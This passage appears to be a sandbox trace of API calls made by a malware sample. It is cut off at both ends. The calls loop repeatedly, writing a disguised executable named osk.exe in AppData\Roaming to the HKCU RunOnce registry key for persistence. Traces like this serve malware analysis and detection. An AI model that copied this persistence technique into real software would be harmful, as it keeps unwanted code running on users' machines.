[7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0091.985] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0091.985] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0091.985] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x65 [0091.985] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0091.985] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x66 [0091.985] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0091.986] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x65 [0091.986] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.986] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0091.986] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.986] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.986] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0091.986] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0091.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0091.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0091.986] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0091.986] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0091.987] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0091.987] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0091.987] RegCloseKey (hKey=0x280) returned 0x0 [0091.987] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.987] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.987] SetTimer (hWnd=0x20280, nIDEvent=0x21e1, uElapse=0xa, lpTimerFunc=0x0) returned 0x21e1 [0091.987] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0091.999] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.999] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.999] KillTimer (hWnd=0x20280, uIDEvent=0x21e1) returned 1 [0091.999] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.999] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.000] IUnknown:Release (This=0x787518) returned 0x1 [0092.000] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.000] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.000] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.000] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.000] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.000] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.000] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.000] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.000] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.000] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x66 [0092.001] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.001] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x67 [0092.001] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.002] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x66 [0092.002] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.002] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.002] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.002] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.002] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.002] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.002] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.002] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.002] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.003] RegCloseKey (hKey=0x280) returned 0x0 [0092.003] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.003] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.003] SetTimer (hWnd=0x20280, nIDEvent=0x21e2, uElapse=0xa, lpTimerFunc=0x0) returned 0x21e2 [0092.003] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.014] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.014] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.014] KillTimer (hWnd=0x20280, uIDEvent=0x21e2) returned 1 [0092.015] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.015] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.015] IUnknown:Release (This=0x787518) returned 0x1 [0092.015] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.015] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.015] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.015] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.015] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.016] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.016] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.016] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.016] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.016] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x67 [0092.016] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.016] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x68 [0092.016] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.017] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x67 [0092.017] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.017] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.017] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.017] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.017] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.017] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.017] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.018] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.018] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.018] RegCloseKey (hKey=0x280) returned 0x0 [0092.018] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.018] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.018] SetTimer (hWnd=0x20280, nIDEvent=0x21e3, uElapse=0xa, lpTimerFunc=0x0) returned 0x21e3 [0092.018] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.030] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.030] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.030] KillTimer (hWnd=0x20280, uIDEvent=0x21e3) returned 1 [0092.030] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.030] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.031] IUnknown:Release (This=0x787518) returned 0x1 [0092.031] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.031] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.031] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.031] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.031] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.031] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.031] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.031] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.031] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.032] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x68 [0092.032] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.032] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x69 [0092.032] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: 